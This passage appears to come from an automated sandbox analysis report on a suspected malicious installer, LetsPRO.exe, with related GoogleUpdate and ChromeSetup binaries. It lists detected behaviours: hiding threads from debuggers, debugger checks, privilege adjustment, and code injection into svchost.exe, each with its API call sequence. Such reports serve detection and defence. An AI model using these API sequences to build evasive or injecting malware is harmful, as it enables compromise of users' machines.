Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW, 30_2_6CCCA66F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose, 30_2_6CC98D3E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, 4_2_03F380F0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F35430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 4_2_03F35430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsth
Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread information set: HideFromDebugger
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe System information queried: KernelDebuggerInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_025F8667
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9667A CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile, 30_2_6CC9667A
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C976D54 VirtualProtect ?,-00000001,00000104,? 5_2_6C976D54
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 4_2_03F37490
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_004012C0 mov eax, dword ptr fs:[00000030h] 4_2_004012C0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_004012D1 mov eax, dword ptr fs:[00000030h] 4_2_004012D1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00265217 mov eax, dword ptr fs:[00000030h] 8_2_00265217
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025EDE2 mov eax, dword ptr fs:[00000030h] 8_2_0025EDE2
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001900A mov ecx, dword ptr fs:[00000030h] 16_2_0001900A
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001DE65 mov eax, dword ptr fs:[00000030h] 16_2_0001DE65
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012D8C7 mov eax, dword ptr fs:[00000030h] 30_2_0012D8C7
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012C11B mov ecx, dword ptr fs:[00000030h] 30_2_0012C11B
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDEFAB3 mov eax, dword ptr fs:[00000030h] 30_2_6CDEFAB3
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_00401244 GetProcessHeap,RtlAllocateHeap, 4_2_00401244
Enables debug privileges
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process token adjusted: Debug
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process token adjusted: Debug
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_025F8667
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, 4_2_03F3DF10
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_03F3F00A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F41F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_03F41F67
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C97AEE4 _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook, 5_2_6C97AEE4
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C900837 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 5_2_6C900837
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C97C24F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 5_2_6C97C24F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00258A28
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_0025DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0025DAD2
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00258E32
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258FC5 SetUnhandledExceptionFilter, 8_2_00258FC5
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_000158B2 SetUnhandledExceptionFilter, 16_2_000158B2
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00015B6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00015B6F
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001C4FA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0001C4FA
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001571F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0001571F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00127825 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_00127825
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012755D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_0012755D
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_001279BB SetUnhandledExceptionFilter, 30_2_001279BB
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012BA61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_0012BA61
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC21B3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,_Deallocate,LeaveCriticalSection,RtlDeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,RtlDeleteCriticalSection,CloseHandle,CloseHandle,RtlDeleteCriticalSection, 30_2_6CDC21B3
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC1F0D CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection, 30_2_6CDC1F0D
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDD6B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_6CDD6B01
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC2443 SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection, 30_2_6CDC2443
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDD6737 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_6CDD6737
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC23D6 EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler, 30_2_6CDC23D6
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDDCEFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_6CDDCEFC

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F377E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 4_2_03F377E0
Contains functionality to inject threads in other processes
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F377E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 4_2_03F377E0
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 4_2_03F377E0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 4_2_03F377E0
Contains functionality to launch a program with higher privileges
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9975D SetForegroundWindow,ShellExecuteExW,AllowSetForegroundWindow,GetLastError,SetLastError,GetLastError,DestroyWindow,SetLastError, 30_2_6CC9975D
Creates a process in suspended mode (likely to inject code)
